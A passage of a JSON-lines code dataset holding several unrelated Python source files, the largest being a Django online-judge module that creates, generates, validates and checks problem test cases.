line.lot_id.product_id.product_tmpl_id.x_card_type == 'keep_card':\n if line.paid_count < line.used_count + line.qty:\n line.amount = (line.qty + line.used_count - line.paid_count) * line.price_unit * (1 - (line.discount / 100))","sub_path":"izi_pos_use_service/models/pos_use_service_line.py","file_name":"pos_use_service_line.py","file_ext":"py","file_size_in_byte":7743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"365348716","text":"from django.forms import ModelForm, TextInput, Textarea, EmailInput, URLInput\nfrom .models import Comment\n\n\nclass CommentForm(ModelForm):\n class Meta:\n model = Comment\n fields = ['author', 'author_mail', 'author_url', 'body']\n widgets = {\n 'author': TextInput(attrs={'id': 'author',\n 'class': 'form-control input-control clearfix',\n 'placeholder': '昵称*'\n }),\n 'author_mail': EmailInput(attrs={'id': 'mail',\n 'class': 'form-control input-control clearfix',\n 'placeholder': '邮箱*',\n }),\n 'author_url': URLInput(attrs={'id': 'url',\n 'class': 'form-control input-control clearfix',\n 'placeholder': '博客地址 (http://)'}),\n 'body': Textarea(attrs={'id': 'textarea',\n 'class': 'form-control',\n 'placeholder': '说点什么吧'\n })\n }\n","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"362226466","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport datetime as dt\r\n\r\nimport dill\r\nimport pandas as pd\r\n\r\ndef write_to_ser(obj, fileName):\r\n\toutFile = open(fileName, 'wb')\r\n\tdill.dump(obj, outFile)\r\n\r\n\toutFile.close()\r\n\r\ndef read_from_ser(fileName):\r\n\tinFile = open(fileName, 'rb')\r\n\tobj = dill.load(inFile)\r\n\r\n\treturn obj\r\n\r\ndef get_DJI_symbols():\r\n\tf = open('data/symbols_files/DJI_symbols.dat', 'w')\r\n\tDJI_list = pd.read_html('https://en.wikipedia.org/wiki/Dow_Jones_Industrial_Average')\r\n\r\n\tfor symbol in DJI_list[1]['Symbol']:\r\n\t\tf.write(symbol + '\\n')\r\n\r\n\tf.close()\r\n\r\ndef get_GSPC_symbols():\r\n\tf = open('data/symbols_files/GSPC_symbols.dat', 'w')\r\n\tGSPC_list = pd.read_html('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\r\n\r\n\tfor symbol in GSPC_list[0]['Symbol']:\r\n\t\tf.write(symbol + '\\n')\r\n\r\n\tf.close()\r\n\r\ndef get_GDAXI_symbols():\r\n\tf = open('data/symbols_files/GDAXI_symbols.dat', 'w')\r\n\tGDAXI_list = pd.read_html('https://en.wikipedia.org/wiki/DAX')\r\n\r\n\tfor symbol in GDAXI_list[2]['Ticker symbol']:\r\n\t\tf.write(symbol + '.DE\\n')\r\n\r\n\tf.close()\r\n\r\ndef open_symbols_file(index):\r\n\tf = open('data/symbols_files/' + index + '_symbols.dat', 'r')\r\n\tsymbols = [symbol.strip() for symbol in f]\r\n\r\n\tf.close()\r\n\r\n\treturn symbols\r\n\r\ndef open_sectors_file(sector):\r\n\tf = open('GSPC_sectors\\\\' + sector + '.dat', 'r')\r\n\tsymbols = [symbol.strip() for symbol in f]\r\n\r\n\tf.close()\r\n\r\n\treturn symbols\r\n\r\ndef get_directory_size(directory, MB = True):\r\n\ttotal = 0\r\n\r\n\tfor dirpath, dirnames, filenames in os.walk(directory):\r\n\t\tfor f in filenames:\r\n\t\t\tfp = os.path.join(dirpath, f)\r\n\r\n\t\t\ttotal += os.path.getsize(fp)\r\n\r\n\tif MB:\r\n\t\treturn total / (1024 ** 2)\r\n\telse:\r\n\t\treturn total\r\n\r\ndef get_current_time():\r\n\treturn dt.datetime.now().strftime(\"%H:%M:%S\")\r\n\r\ndef progress_bar(iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\r\n\tpercent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\r\n\tfilled_length = int(length * iteration // total)\r\n\tbar = fill * filled_length + '-' * (length - filled_length)\r\n\r\n\tprint('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end = '\\r')\r\n\r\n\tif iteration == total:\r\n\t\tprint()\r\n\r\ndef main():\r\n\tpass\r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"231009035","text":"#!/bin/python\n\nfrom pyModbusTCP.server import ModbusServer, DataBank\nfrom time import sleep\nfrom random import uniform\nimport logging\nimport sys\n#Create an instance of ModbusServer\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\n\ntry:\n logging.info(\"Iniciando\")\n server = ModbusServer(host=\"localhost\", port=5020)\n logging.info(\"Start server...\")\n #print(\"Start server...\")\n server.start()\n logging.info(\"Server is online\")\n print(\"Server is online\")\n state=[0]\n while True:\n DataBank.set_words(0,[int(uniform(0,100))])\n if state != DataBank.get_words(1):\n state = DataBank.get_words(1)\n print(\"Value of Registers 1 has changed to =\" + str(state))\n sleep(0.5)\n \nexcept Exception as e:\n logging.info(\"Error: {0}\".format(str(e)))\n print(\"Shutdown server ....\")\n server.stop()\n print(\"Server is offline\")","sub_path":"app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"301429380","text":"import sys\nimport types\nfrom memstor.memstor import MemStor, Data\nfrom common import logger\n\nclass CommonWorkerException(Exception):\n pass\n\nclass Worker(object):\n __base_class__=\"Worker\"\n __name__=\"Worker\"\n \n def __init__(self):\n logger.info(\"New worker \"+self.__name__)\n self._memstor=MemStor()\n #register meta\n if hasattr(self,\"__meta__\"):\n self.register_meta(self.__meta__)\n else:\n logger.error(\"Workder must have __meta__ defined for charting.\")\n raise CommonWorkerException(__name__,\"Workder must have __meta__ defined for charting.\")\n #init\n if hasattr(self,\"initialize\"):\n logger.info(\"Initialize worker \"+self.__name__)\n self.initialize()\n \n def register_meta(self,meta):\n logger.info(\"Register Meta for Worker\"+self.__name__)\n \n if not self._memstor.HasKey('Metadata'):\n self._memstor.AddNewKey('Metadata')\n current_meta={}\n else:\n current_meta=self._memstor.ReadData('Metadata')[0]\n \n key=self.__name__\n if meta.has_key('_values') and meta.has_key('_label'):\n if(type(meta['_values'])==types.StringType):\n meta['_values']=(meta['_values'],)\n if(type(meta['_values'])==types.TupleType):\n current_meta[key]=meta\n self._memstor.AddNewData('Metadata',Data(current_meta,exclusive=True))\n else:\n logger.error(\"__meta__,_values must be tuple.\")\n raise CommonWorkerException(__name__,\"__meta__,_values must be tuple.\")\n else:\n logger.error(\"__meta__ must have _label and _values defined\")\n raise CommonWorkerException(__name__,\"__meta__ must have _label and _values defined\")\n \n def set_memstor_key(self,memstor_key):\n \"\"\"initialize(self,memstor_key)\"\"\"\n self._memstor_key=memstor_key\n logger.info(self.__name__+\" setting memstor key to \"+ self._memstor_key)\n \n def record(self):\n if hasattr(self,\"_data\"):\n logger.info(self.__name__+\" is storing Data: \"+str(self._data))\n \n if not self._memstor.HasKey(self.__name__):\n self._memstor.AddNewKey(self.__name__)\n self._memstor.AddNewData(self.__name__,Data(self._data))\n\n def __finalize__(self):\n pass\n\n\nclass Clerk(Worker):\n def record(self):\n \"\"\"WILL NOT RECORD\"\"\"\n \n def register_meta(self,meta):\n \"\"\"WILL NOT REGISTER\"\"\"","sub_path":"worker/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"494059401","text":"import random\r\n\r\nclass element:\r\n def __init__(self, next=None, prev=None,value=None):\r\n self.next = next\r\n self.value = value\r\n self.prev = prev\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.first = None\r\n self.last = None\r\n self.length = 0\r\n\r\n def __str__(self):\r\n if self.first != None:\r\n current = self.first\r\n out = 'Список [\\n' +str(current.value) +'\\n'\r\n while current.next != None:\r\n current = current.next\r\n out += str(current.value) + '\\n'\r\n return out + ']'\r\n return 'У тебя пустой список :('\r\n\r\n def clear(self):\r\n self.__init__()\r\n\r\n #добавление последнего элемента\r\n def addlast(self, x):\r\n if x!=None:\r\n self.length+=1\r\n if self.first == None:\r\n self.last = element(None,None,x)\r\n self.first = self.last\r\n else:\r\n self.last.next = element(None,None,x)\r\n self.last.next.prev=self.last\r\n self.last=self.last.next\r\n else:\r\n print('ты пустую переменную засунуть пытаешься')\r\n\r\n #добавление первого элемента\r\n def addfirst(self, x):\r\n if x!=None:\r\n self.length+=1\r\n if self.first == None:\r\n self.last = element(None,None,x)\r\n self.first = self.last\r\n else:\r\n self.first.prev = element(None,None,x)\r\n self.first.prev.next=self.first\r\n self.first=self.first.prev\r\n else:\r\n print('ты пустую переменную засунуть пытаешься')\r\n\r\n\r\n #Аналогичное удаление первого и последнего\r\n def killfirst(self):\r\n if self.first!=None:\r\n if self.first.next!=None:\r\n self.first.next.prev=None\r\n self.first=self.first.next\r\n\r\n def killlast(self):\r\n if self.last!=None:\r\n if self.last.prev!=None:\r\n self.last.prev.next=None\r\n self.last=self.last.prev\r\n\r\n def randomlist(self,dlina,max):\r\n for z in range(dlina):\r\n self.addfirst(random.randrange(max))\r\n\r\n\r\n\r\nl=LinkedList()\r\nl.addfirst(1)\r\nl.addlast(2)\r\nl.addfirst(3)\r\nl.addlast(4)\r\nprint(l)\r\nl.killlast()\r\nl.killlast()\r\nprint(l)\r\nl.clear\r\nprint(l)\r\nl.randomlist(20,100)\r\nprint(l)\r\nl.killfirst()\r\nl.killfirst()\r\nprint(l)\r\n","sub_path":"тип_данных.py","file_name":"тип_данных.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"184068528","text":"import json\nimport os\nimport re\nimport shutil\nimport zipfile\nfrom datetime import datetime\n\nimport io\n\nimport chardet\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.files.base import ContentFile, File\nfrom django.db import transaction\nfrom django.db.models import Max\nfrom django.http import Http404\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseBadRequest\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.views import View\nfrom django.views.generic import CreateView\nfrom django.views.generic import FormView\nfrom django.views.generic import ListView\nfrom django.views.generic import TemplateView\nfrom django.views.generic import UpdateView\nfrom os import path\n\nfrom django_q.tasks import async_task\n\nfrom polygon.models import Case, Program, Task\nfrom polygon.problem2.forms import CaseUpdateForm, CaseCreateForm, CaseUpdateInfoForm\nfrom polygon.problem2.runner import Runner\nfrom polygon.problem2.runner.exception import CompileError\nfrom polygon.problem2.views.base import ProblemRevisionMixin\nfrom utils import random_string\nfrom utils.download import respond_generate_file\nfrom utils.file_preview import sort_data_list_from_directory, special_sort\n\n\nclass UpdateManager(object):\n def __init__(self, object, revision):\n self.object = object\n self.revision = revision\n\n def __enter__(self):\n if self.object.revision_set.all().count() > 1:\n # the case is related to a revision other than this one\n with transaction.atomic():\n # only for cases now\n self.revision.cases.remove(self.object)\n self.object.parent_id = self.object.pk\n self.object.pk = None\n self.object.save()\n self.revision.cases.add(self.object)\n return self.object\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.object.save()\n\n\nclass CaseManagementTools(object):\n white_space_reg = re.compile(r'[\\x00-\\x20\\s]+')\n\n @staticmethod\n def read_by_formed_lines(fileobj):\n for line in fileobj:\n yield ' '.join(CaseManagementTools.white_space_reg.split(line.strip()))\n\n @staticmethod\n def well_form_text(text):\n stream = io.StringIO(text.strip())\n out_stream = io.StringIO()\n for line in CaseManagementTools.read_by_formed_lines(stream):\n out_stream.writelines([line, '\\n'])\n out_stream.seek(0)\n return out_stream.read()\n\n @staticmethod\n def well_form_binary(binary):\n try:\n encoding = chardet.detect(binary).get('encoding', 'utf-8')\n return CaseManagementTools.well_form_text(binary.decode(encoding))\n except:\n return ''\n\n @staticmethod\n def reformat(txt, well_form_policy=True):\n if isinstance(txt, str):\n txt = txt.encode()\n if well_form_policy:\n return CaseManagementTools.well_form_binary(txt)\n else: return txt\n\n @staticmethod\n def reformat_file(file_path, well_form_policy=True):\n if well_form_policy:\n with open(file_path, \"rb+\") as file_obj:\n file_obj.seek(0)\n ret = CaseManagementTools.reformat(file_obj.read())\n file_obj.seek(0)\n file_obj.truncate(0)\n file_obj.write(ret.encode())\n\n @staticmethod\n def naturalize_order(revision, case_set):\n with transaction.atomic():\n for idx, case in enumerate(case_set, start=1):\n if idx != case.case_number:\n with UpdateManager(case, revision) as t:\n t.case_number = idx\n\n @staticmethod\n def generate_cases(revision, commands):\n \"\"\"\n report: [\n {\n success: True / False\n error: ...\n case_number: 1\n detail: ...\n }, { ... }, ...\n ]\n \"\"\"\n generators = {}\n current_task = Task.objects.create(revision=revision, abstract=\"GENERATE CASES\")\n report = []\n for command_string in commands:\n ret = {\"command\": command_string}\n command = command_string.split()\n program_name, program_args = command[0], command[1:]\n try:\n if program_name not in generators:\n program = revision.programs.get(name=program_name, tag=\"generator\")\n generators[program_name] = Runner(program)\n elif isinstance(generators[program_name], CompileError):\n raise generators[program_name]\n runner = generators[program_name]\n if revision.cases.all().count():\n case_number = revision.cases.all().aggregate(Max(\"case_number\"))[\"case_number__max\"] + 1\n else: case_number = 1\n new_case = Case(create_time=datetime.now(),\n description=\"Gen \\\"%s\\\"\" % command_string,\n case_number=case_number)\n new_case.input_file.save(\"in_\" + random_string(), ContentFile(b\"\"), save=False)\n new_case.output_file.save(\"out_\" + random_string(), ContentFile(b\"\"), save=False)\n running_result = runner.run(args=program_args, stdout=new_case.input_file.path,\n max_time=revision.time_limit * 5 / 1000,\n max_memory=revision.memory_limit * 3)\n CaseManagementTools.reformat_file(new_case.input_file.path, revision.well_form_policy)\n new_case.save_fingerprint(revision.problem_id)\n ret[\"case_number\"] = case_number\n with transaction.atomic():\n new_case.save()\n revision.cases.add(new_case)\n ret.update(case_number=case_number,\n success=running_result[\"verdict\"] == \"OK\",\n detail=running_result,\n generated=new_case.input_preview)\n except (Program.MultipleObjectsReturned, Program.DoesNotExist):\n ret.update(success=False,\n error=\"There should be exactly one program tagged 'generator' that fits the command.\")\n except CompileError as e:\n generators[program_name] = e\n ret.update(success=False, error=e.error)\n report.append(ret)\n current_task.status = -2\n current_task.report = json.dumps(report)\n current_task.status = 0 if all(map(lambda r: r[\"success\"], report)) else -1\n current_task.save()\n\n @staticmethod\n def run_case_output(revision, case_set, solution):\n \"\"\"\n report: similar to generating cases, [{ }, { }, ... { }]\n \"\"\"\n current_task = Task.objects.create(revision=revision, abstract=\"RUN OUTPUT, %d cases\" % len(case_set))\n try:\n runner = Runner(solution)\n result = []\n failed = False\n for case in case_set:\n if case.output_lock: continue # output content protected\n with UpdateManager(case, revision) as case:\n case.output_file.save(\"out_\" + random_string(), ContentFile(b''), save=False)\n run_result = runner.run(stdin=case.input_file.path, stdout=case.output_file.path,\n max_time=revision.time_limit * 3 / 1000,\n max_memory=revision.memory_limit * 2)\n CaseManagementTools.reformat_file(case.output_file.path, revision.well_form_policy)\n case.save_fingerprint(revision.problem_id)\n with transaction.atomic():\n case.save()\n result.append({\n \"case_number\": case.case_number,\n \"success\": run_result[\"verdict\"] == \"OK\",\n \"detail\": run_result\n })\n if run_result[\"verdict\"] != \"OK\":\n failed = True\n current_task.status = -2\n current_task.report = json.dumps(result)\n current_task.save()\n current_task.status = -1 if failed else 0\n except CompileError as e:\n current_task.report = json.dumps([{\"success\": False, \"error\": e.error}])\n current_task.status = -1\n current_task.save()\n\n @staticmethod\n def validate_case(revision, case_set, validator):\n \"\"\"\n report: similar to generating cases, [{ }, { }, ... { }]\n \"\"\"\n current_task = Task.objects.create(revision=revision, abstract=\"VALIDATE, %d cases\" % len(case_set))\n try:\n runner = Runner(validator)\n result = []\n failed = False\n for case in case_set:\n output_path = path.join(runner.workspace, \"out\")\n error_path = path.join(runner.workspace, \"err\")\n log_path = path.join(runner.workspace, \"log\")\n args = [\"--testOverviewLogFileName\", log_path]\n if revision.enable_group:\n args.extend([\"--group\", str(case.group)])\n if case.in_samples:\n args.extend([\"--testset\", \"samples\"])\n elif case.in_pretests:\n args.extend([\"--testset\", \"pretests\"])\n run_result = runner.run(args=args,\n stdin=case.input_file.path, stdout=output_path, stderr=error_path,\n max_time=revision.time_limit * 3 / 1000,\n max_memory=revision.memory_limit * 2)\n with transaction.atomic():\n result.append({\n \"case_number\": case.case_number,\n \"success\": run_result[\"verdict\"] == \"OK\",\n \"comment\": CaseManagementTools.read_abstract(output_path),\n \"stderr\": CaseManagementTools.read_abstract(error_path),\n \"log\": CaseManagementTools.read_abstract(log_path),\n \"exit_code\": run_result[\"exit_code\"]\n })\n if run_result[\"verdict\"] != \"OK\":\n failed = True\n current_task.status = -2\n current_task.report = json.dumps(result)\n current_task.save()\n current_task.status = -1 if failed else 0\n except CompileError as e:\n current_task.report = json.dumps([{\"success\": False, \"error\": e.error}])\n current_task.status = -1\n current_task.save()\n\n @staticmethod\n def read_abstract(file_path, read_size=1024):\n try:\n with open(file_path, \"r\") as f:\n t = f.read(read_size + 1)\n if len(t) > read_size:\n return t[:read_size] + '...'\n return t\n except FileNotFoundError:\n return ''\n\n @staticmethod\n def obtain_defaultspj():\n try:\n import requests\n code = requests.get(\"https://raw.githubusercontent.com/ultmaster/ejudge/v2.1/lib/defaultspj.cpp\").text\n program = Program(name=\"defaultspj\", lang=\"cpp\", code=code, tag=\"checker\")\n program.save_fingerprint()\n return program\n except:\n raise ValueError(\"Default checker cannot be obtained. Check network connections.\")\n\n @staticmethod\n def check_case(revision, case_set, solution_set, checker):\n \"\"\"\n response: {\n \"success\": True / False,\n \"error\": ...,\n \"tasks\": [\n {\n \"verdict\": \"OK\",\n \"solution\": 23,\n \"case_number\": 45,\n \"time\": 15,\n \"memory\": 30,\n },\n ...\n ],\n \"summary\": {\n solution_number: {\n time, max_time, memory, points\n }\n }\n }\n \"\"\"\n current_task = Task.objects.create(revision=revision,\n abstract=\"CHECK, %d cases, %d solutions\" % (\n len(case_set), len(solution_set)))\n packed_result = {\"success\": True, \"tasks\": [], \"summary\": {}}\n try:\n solution_runners = [(solution, Runner(solution)) for solution in solution_set]\n if checker is None:\n checker = CaseManagementTools.obtain_defaultspj()\n checker_runner = Runner(checker)\n checker_result_path = path.join(checker_runner.workspace, \"result\")\n task_result = packed_result[\"tasks\"]\n verdict_for_each_solution = {solution.id: set() for solution in solution_set}\n for case in case_set:\n for solution, runner in solution_runners:\n output_path = path.join(runner.workspace, \"out\")\n err_path = path.join(runner.workspace, \"err\")\n result = {\"solution\": solution.id, \"case_number\": case.case_number, \"case_id\": case.id}\n running_result = runner.run(stdin=case.input_file.path, stdout=output_path,\n max_time=revision.time_limit / 1000,\n max_memory=revision.memory_limit)\n result.update(running_result)\n result.update(input=CaseManagementTools.read_abstract(case.input_file.path),\n answer=CaseManagementTools.read_abstract(case.output_file.path),\n output=CaseManagementTools.read_abstract(output_path),\n stderr=CaseManagementTools.read_abstract(err_path))\n\n if result[\"verdict\"] == \"OK\":\n # run checker\n checking_result = checker_runner.run(\n args=[case.input_file.path, output_path, case.output_file.path],\n stdout=checker_result_path,\n max_time=revision.time_limit / 1000 * 3,\n max_memory=revision.memory_limit)\n result.update(checker_comment=CaseManagementTools.read_abstract(checker_result_path),\n checker_exit_code=checking_result[\"exit_code\"])\n if checking_result[\"verdict\"] != \"OK\":\n result.update(verdict=\"WRONG_ANSWER\")\n\n if result[\"verdict\"] == \"OK\":\n result.update(points=case.points)\n else: result.update(points=0)\n result.update(total_points=case.points)\n\n verdict_for_each_solution[solution.id].add(result[\"verdict\"])\n task_result.append(result)\n for solution in solution_set:\n got_verdicts = verdict_for_each_solution[solution.id]\n if solution.tag in ('solution_main', 'solution_correct') and got_verdicts != {\"OK\"}:\n packed_result.update(success=False,\n error=\"'%s' claims to be correct, but got rejected in tests\" % solution.name)\n if solution.tag == 'solution_tle_or_ok' and got_verdicts != {\"TIME_LIMIT\", \"OK\"}:\n packed_result.update(success=False, error=\"'%s' claims to be tle_or_ok, but got %s\" % (\n solution.name, str(got_verdicts)))\n if solution.tag == 'solution_wa' and 'WRONG_ANSWER' not in got_verdicts:\n packed_result.update(success=False, error=\"'%s' claims to be WA, but never got WA\" % solution.name)\n if solution.tag == 'solution_incorrect' and got_verdicts == {\"OK\"}:\n packed_result.update(success=False,\n error=\"'%s' claims to be incorrect, but is actually correct\" % solution.name)\n if solution.tag == 'solution_fail' and \"RUNTIME_ERROR\" not in got_verdicts:\n packed_result.update(success=False, error=\"'%s' claims to fail, but didn't fail\" % solution.name)\n solution_based_result = list(filter(lambda x: x[\"solution\"] == solution.id, task_result))\n solution_time_summary = list(map(lambda x: x[\"time\"], solution_based_result)) + [0]\n packed_result[\"summary\"][solution.id] = {\n \"time\": max(solution_time_summary),\n \"sum_time\": sum(solution_time_summary),\n \"memory\": max(list(map(lambda x: x[\"memory\"], solution_based_result)) + [0]),\n \"points\": sum(list(map(lambda x: x[\"points\"], solution_based_result)) + [0]) /\n max(sum(list(map(lambda x: x[\"total_points\"], solution_based_result)) + [0]), 1) * 100\n }\n current_task.status = -2\n current_task.report = json.dumps(packed_result)\n current_task.save()\n except CompileError as e:\n packed_result.update(success=False, error=e.error)\n except ValueError as e:\n packed_result.update(success=True, error=e.args[0])\n current_task.status = 0 if packed_result[\"success\"] else -1\n current_task.report = json.dumps(packed_result)\n current_task.save()\n\n\nREFORMAT = CaseManagementTools.reformat\nNATURALIZE_ORDER = CaseManagementTools.naturalize_order\n\n\nclass RevisionCaseMixin(ProblemRevisionMixin):\n model_class = Case\n\n def init_revision(self, *args, **kwargs):\n super().init_revision(*args, **kwargs)\n if not self.verify_belong_to_revision(kwargs['cpk']):\n raise Http404(\"No cases found matching the query\")\n self.case = Case.objects.get(pk=kwargs['cpk'])\n\n\nclass RevisionMultipleCasesMixin(ProblemRevisionMixin):\n\n def init_revision(self, *args, **kwargs):\n super().init_revision(*args, **kwargs)\n self.pk_set = set(filter(lambda x: x, self.request.POST[\"gather\"].split(\",\")))\n if not self.pk_set:\n raise ValueError(\"Invalid selected cases\")\n self.case_set = self.revision.cases.filter(pk__in=self.pk_set).order_by(\"case_number\")\n if len(self.case_set) != len(self.pk_set):\n raise ValueError(\"Invalid selected cases\")\n\n def get_redirect_url(self):\n return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n\nclass CaseList(ProblemRevisionMixin, ListView):\n template_name = 'polygon/problem2/case/list.jinja2'\n context_object_name = 'case_list'\n polygon_title = \"数据管理\"\n\n def get_queryset(self):\n qs = self.revision.cases.all().order_by(\"case_number\")\n for case in qs:\n case.comments = []\n if case.description:\n case.comments.append(case.description)\n if case.in_samples:\n case.comments.append(\"Sample\")\n if case.in_pretests:\n case.comments.append(\"Pretest\")\n if case.output_lock:\n case.comments.append(\"Output locked\")\n if not case.activated:\n case.comments.append(\"Excluded in tests\")\n case.comments.append(\"Worth %d pts.\" % case.points)\n return qs\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if not data['revision_readonly']:\n data[\"disable_grid\"] = True\n return data\n\n\nclass CaseCreateView(ProblemRevisionMixin, FormView):\n form_class = CaseCreateForm\n template_name = 'polygon/problem2/case/create.jinja2'\n polygon_title = \"添加数据\"\n\n def get_success_url(self):\n return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n def form_valid(self, form):\n global_create_time = datetime.now()\n option = form.cleaned_data[\"option\"]\n case_number_start = form.cleaned_data[\"case_number\"]\n cases = []\n\n if option in (\"single\", \"text\"):\n if option == \"single\":\n input_binary = REFORMAT(form.cleaned_data[\"input_file\"].read(), self.revision.well_form_policy)\n output_binary = REFORMAT(form.cleaned_data[\"output_file\"].read(), self.revision.well_form_policy)\n description = \"File \\\"%s\\\" and \\\"%s\\\"\" % (\n form.cleaned_data[\"input_file\"].name, form.cleaned_data[\"output_file\"].name)\n else:\n input_binary = REFORMAT(form.cleaned_data[\"input_text\"].encode(), self.revision.well_form_policy)\n output_binary = REFORMAT(form.cleaned_data[\"output_text\"].encode(), self.revision.well_form_policy)\n description = \"Typed-in case\"\n case = Case(create_time=global_create_time,\n in_samples=form.cleaned_data[\"in_samples\"],\n output_lock=form.cleaned_data[\"output_lock\"],\n description=description,\n activated=form.cleaned_data[\"activated\"])\n case.input_file.save(\"in\", ContentFile(input_binary), save=False)\n case.output_file.save(\"out\", ContentFile(output_binary), save=False)\n case.save_fingerprint(self.problem.id)\n cases.append(case)\n\n elif option == \"batch\":\n tmp_directory = '/tmp/' + random_string()\n with zipfile.ZipFile(form.cleaned_data[\"batch_file\"]) as myZip:\n myZip.extractall(path=tmp_directory)\n case_config = {}\n if path.exists(path.join(tmp_directory, \"data.json\")):\n with open(path.join(tmp_directory, \"data.json\")) as json_config:\n case_config = json.loads(json_config.read())\n for inf, ouf in sort_data_list_from_directory(tmp_directory):\n with open(path.join(tmp_directory, inf), 'rb') as ins, open(path.join(tmp_directory, ouf),\n 'rb') as ous:\n conf = case_config.get(inf, {})\n case = Case(create_time=global_create_time,\n description=conf.get(\"description\", \"From \\\"%s\\\": (%s, %s)\" %\n (form.cleaned_data[\"batch_file\"].name, inf, ouf)),\n in_samples=conf.get(\"in_samples\", False),\n in_pretests=conf.get(\"in_pretests\", False),\n activated=conf.get(\"activated\", True),\n group=conf.get(\"group\", 0),\n output_lock=conf.get(\"output_lock\", False),\n points=conf.get(\"points\", 10))\n if self.revision.well_form_policy:\n case.input_file.save(\"in\", ContentFile(REFORMAT(ins.read(), True)), save=False)\n case.output_file.save(\"out\", ContentFile(REFORMAT(ous.read(), True)), save=False)\n else:\n case.input_file.save(\"in\", File(ins), save=False)\n case.output_file.save(\"out\", File(ous), save=False)\n case.save_fingerprint(self.problem.id)\n cases.append(case)\n shutil.rmtree(tmp_directory)\n\n elif option == \"batch_input\":\n tmp_directory = '/tmp/' + random_string()\n with zipfile.ZipFile(form.cleaned_data[\"batch_file\"]) as myZip:\n myZip.extractall(path=tmp_directory)\n for file in special_sort(os.listdir(tmp_directory)):\n file_abspath = os.path.join(tmp_directory, file)\n if os.path.isdir(file_abspath) or file.startswith(\".\"):\n continue\n with open(path.join(tmp_directory, file), 'rb') as in_file:\n case = Case(create_time=global_create_time, description=\"File \\\"%s\\\"\" % file)\n if self.revision.well_form_policy:\n case.input_file.save(\"in\", ContentFile(REFORMAT(in_file.read(), True)), save=False)\n else:\n case.input_file.save(\"in\", File(in_file), save=False)\n case.output_file.save(\"out\", ContentFile(\"\"), save=False)\n case.save_fingerprint(self.problem.id)\n cases.append(case)\n shutil.rmtree(tmp_directory)\n\n elif option == \"gen\":\n commands = list(map(lambda x: \" \".join(x.split()),\n filter(lambda x: x, form.cleaned_data[\"gen_command\"].split(\"\\n\"))))\n async_task(CaseManagementTools.generate_cases, self.revision, commands)\n\n # process case numbers\n remove_list = []\n if case_number_start <= 0:\n # auto fill the empty indices\n idx = 1\n exist = set(self.revision.cases.all().values_list(\"case_number\", flat=True))\n for case in cases:\n while idx in exist:\n idx += 1\n exist.add(idx)\n case.case_number = idx\n else:\n idx = case_number_start\n for case in cases:\n case.case_number = idx\n idx += 1\n for case in self.revision.cases.filter(case_number__gte=case_number_start).order_by(\"case_number\"):\n # do modifications to modified cases\n if idx != case.case_number:\n case.case_number = idx\n idx += 1\n case.parent_id = case.id\n remove_list.append(Case(pk=case.id))\n case.id = None\n cases.append(case)\n\n with transaction.atomic():\n for case in cases:\n case.save()\n self.revision.cases.add(*cases)\n self.revision.cases.remove(*remove_list)\n\n messages.success(self.request, \"%d case(s) has been added. Maybe some other cases are generating.\" % len(cases))\n\n return redirect(self.get_success_url())\n\n\nclass CaseUpdateFileView(RevisionCaseMixin, FormView):\n form_class = CaseUpdateForm\n template_name = 'polygon/problem2/case/update.jinja2'\n polygon_title = \"更新数据\"\n\n def get_success_url(self):\n return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n def get_object(self):\n return self.case\n\n def form_valid(self, form):\n with transaction.atomic():\n object = self.get_object()\n if form.cleaned_data[\"option\"] == \"file\":\n input_binary = REFORMAT(form.cleaned_data[\"input_file\"].read(), self.revision.well_form_policy)\n output_binary = REFORMAT(form.cleaned_data[\"output_file\"].read(), self.revision.well_form_policy)\n else:\n input_binary = REFORMAT(form.cleaned_data[\"input_text\"].encode(), self.revision.well_form_policy)\n output_binary = REFORMAT(form.cleaned_data[\"output_text\"].encode(), self.revision.well_form_policy)\n with UpdateManager(object, self.revision) as object:\n object.input_file.save(\"in\", ContentFile(input_binary), save=False)\n object.output_file.save(\"out\", ContentFile(output_binary), save=False)\n object.save_fingerprint(self.problem.id)\n return redirect(self.get_success_url())\n\n\nclass CaseUpdateInfoView(RevisionCaseMixin, UpdateView):\n form_class = CaseUpdateInfoForm\n template_name = 'polygon/problem2/simple_form.jinja2'\n polygon_title = \"更新数据\"\n\n def get_success_url(self):\n return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n def get_object(self, queryset=None):\n return self.case\n\n def form_valid(self, form):\n with transaction.atomic():\n with UpdateManager(self.object, self.revision) as case:\n case = form.save()\n return redirect(self.get_success_url())\n\n\nclass CaseDeleteView(RevisionCaseMixin, View):\n def post(self, request, *args, **kwargs):\n try:\n 